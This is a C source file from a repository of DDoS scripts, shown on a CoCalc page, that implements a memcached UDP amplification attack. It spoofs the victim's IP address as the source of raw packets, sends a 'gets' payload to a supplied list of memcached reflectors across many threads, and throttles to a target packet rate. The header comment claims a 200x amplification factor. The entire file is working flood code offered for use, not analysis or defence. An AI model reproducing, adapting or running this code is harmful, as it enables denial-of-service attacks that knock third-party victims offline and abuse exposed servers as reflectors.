Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/Port 11211 - MemcacheD (bonus seeding scripts)/memcached-static.c
4622 views
1
/*-------------------------------

2
Meme-cacheD amplification on the dumb template C script. 

3
Working in 2020 with 200x amplification factor.

4
Dumb C socket template modified to perform memcached by Phenomite.

5
-------------------------------*/

6
#include <arpa/inet.h>

7
#include <netinet/ip.h>

8
#include <netinet/udp.h>

9
#include <pthread.h>

10
#include <stdio.h>

11
#include <stdlib.h>

12
#include <string.h>

13
#include <sys/socket.h>

14
#include <time.h>

15
#include <unistd.h>

16


17
#define MAX_PACKET_SIZE 4096

18
#define PHI 0x9e3779b9

19
static uint32_t Q[4096], c = 362436;

20
static unsigned int DPORT = 11211;

21


22
/* Use the memcached-seeder.py to populate the list IP's with these memcached

23
 * key values! */

24
static const char PAYLOAD[] = "\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n";

25
static unsigned int PAYLOADSIZE = sizeof(PAYLOAD) - 1;

26


27
struct list {

28
  struct sockaddr_in data;

29
  struct list *next;

30
  struct list *prev;

31
};

32
struct list *head;

33
volatile int tehport;

34
volatile int limiter;

35
volatile unsigned int pps;

36
volatile unsigned int sleeptime = 100;

37
struct thread_data {

38
  int thread_id;

39
  struct list *list_node;

40
  struct sockaddr_in sin;

41
};

42


43
void init_rand(uint32_t x) {

44
  int i;

45
  Q[0] = x;

46
  Q[1] = x + PHI;

47
  Q[2] = x + PHI + PHI;

48
  for (i = 3; i < 4096; i++) {

49
    Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;

50
  }

51
}

52


53
uint32_t rand_cmwc(void) {

54
  uint64_t t, a = 18782LL;

55
  static uint32_t i = 4095;

56
  uint32_t x, r = 0xfffffffe;

57
  i = (i + 1) & 4095;

58
  t = a * Q[i] + c;

59
  c = (t >> 32);

60
  x = t + c;

61
  if (x < c) {

62
    x++;

63
    c++;

64
  }

65
  return (Q[i] = r - x);

66
}

67


68
/* function for header checksums */

69
unsigned short csum(unsigned short *buf, int nwords) {

70
  unsigned long sum;

71
  for (sum = 0; nwords > 0; nwords--)

72
    sum += *buf++;

73
  sum = (sum >> 16) + (sum & 0xffff);

74
  sum += (sum >> 16);

75
  return (unsigned short)(~sum);

76
}

77


78
void setup_ip_header(struct iphdr *iph) {

79
  iph->ihl = 5;

80
  iph->version = 4;

81
  iph->tos = 0;

82
  iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + PAYLOADSIZE;

83
  iph->id = htonl(rand() % 65337 + 1);

84
  iph->frag_off = 0;

85
  iph->ttl = 64; // MAXTTL

86
  iph->protocol = IPPROTO_UDP;

87
  iph->check = 0;

88
  iph->saddr = inet_addr("127.0.0.1");

89
}

90
void setup_udp_header(struct udphdr *udph) {

91
  udph->source = htons(rand() % 65337 + 80);

92
  udph->dest = htons(DPORT);

93
  udph->check = 0;

94
  memcpy((void *)udph + sizeof(struct udphdr), PAYLOAD, PAYLOADSIZE);

95
  udph->len = htons(sizeof(struct udphdr) + PAYLOADSIZE);

96
}

97
void *flood(void *par1) {

98
  struct thread_data *td = (struct thread_data *)par1;

99
  char datagram[MAX_PACKET_SIZE];

100
  struct iphdr *iph = (struct iphdr *)datagram;

101
  struct udphdr *udph = (/*u_int8_t*/ void *)iph + sizeof(struct iphdr);

102
  struct sockaddr_in sin = td->sin;

103
  struct list *list_node = td->list_node;

104
  int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

105
  if (s < 0) {

106
    fprintf(stderr, "Could not open raw socket.\n");

107
    exit(-1);

108
  }

109
  init_rand(time(NULL));

110
  memset(datagram, 0, MAX_PACKET_SIZE);

111
  setup_ip_header(iph);

112
  setup_udp_header(udph);

113
  udph->source = htons(rand() % 65337 + 80); // Avoid first 80

114
  iph->saddr = sin.sin_addr.s_addr;

115
  iph->daddr = list_node->data.sin_addr.s_addr;

116
  iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

117
  int tmp = 1;

118
  const int *val = &tmp;

119
  if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof(tmp)) < 0) {

120
    fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

121
    exit(-1);

122
  }

123
  init_rand(time(NULL));

124
  register unsigned int i;

125
  i = 0;

126
  while (1) {

127
    list_node = list_node->next;

128
    iph->daddr = list_node->data.sin_addr.s_addr;

129
    iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

130
    iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

131
    sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *)&list_node->data,

132
           sizeof(list_node->data));

133
    pps++;

134
    if (i >= limiter) {

135
      i = 0;

136
      usleep(sleeptime);

137
    }

138
    i++;

139
  }

140
}

141
int main(int argc, char *argv[]) {

142
  if (argc < 6) {

143
    fprintf(stdout, "%s hst prt ref thread lim time\n", argv[0]);

144
    exit(-1);

145
  }

146
  srand(time(NULL));

147
  int i = 0;

148
  head = NULL;

149
  int max_len = 128;

150
  char *buffer = (char *)malloc(max_len);

151
  buffer = memset(buffer, 0x00, max_len);

152
  int num_threads = atoi(argv[4]);

153
  int maxpps = atoi(argv[5]);

154
  limiter = 0;

155
  pps = 0;

156
  int multiplier = 20;

157
  FILE *list_fd = fopen(argv[3], "r");

158
  while (fgets(buffer, max_len, list_fd) != NULL) {

159
    if ((buffer[strlen(buffer) - 1] == '\n') ||

160
        (buffer[strlen(buffer) - 1] == '\r')) {

161
      buffer[strlen(buffer) - 1] = 0x00;

162
      if (head == NULL) {

163
        head = (struct list *)malloc(sizeof(struct list));

164
        bzero(&head->data, sizeof(head->data));

165
        head->data.sin_addr.s_addr = inet_addr(buffer);

166
        head->next = head;

167
        head->prev = head;

168
      } else {

169
        struct list *new_node = (struct list *)malloc(sizeof(struct list));

170
        memset(new_node, 0x00, sizeof(struct list));

171
        new_node->data.sin_addr.s_addr = inet_addr(buffer);

172
        new_node->prev = head;

173
        new_node->next = head->next;

174
        head->next = new_node;

175
      }

176
      i++;

177
    } else {

178
      continue;

179
    }

180
  }

181
  struct list *current = head->next;

182
  pthread_t thread[num_threads];

183
  struct sockaddr_in sin;

184
  sin.sin_family = AF_INET;

185
  sin.sin_addr.s_addr = inet_addr(argv[1]);

186
  struct thread_data td[num_threads];

187
  for (i = 0; i < num_threads; i++) {

188
    td[i].thread_id = i;

189
    td[i].sin = sin;

190
    td[i].list_node = current;

191
    pthread_create(&thread[i], NULL, &flood, (void *)&td[i]);

192
  }

193
  fprintf(stdout, "Yeeting\n");

194
  for (i = 0; i < (atoi(argv[6]) * multiplier); i++) {

195
    usleep((1000 / multiplier) * 1000);

196
    if ((pps * multiplier) > maxpps) {

197
      if (1 > limiter) {

198
        sleeptime += 100;

199
      } else {

200
        limiter--;

201
      }

202
    } else {

203
      limiter++;

204
      if (sleeptime > 25) {

205
        sleeptime -= 25;

206
      } else {

207
        sleeptime = 0;

208
      }

209
    }

210
    pps = 0;

211
  }

212
  return 0;

213
}

214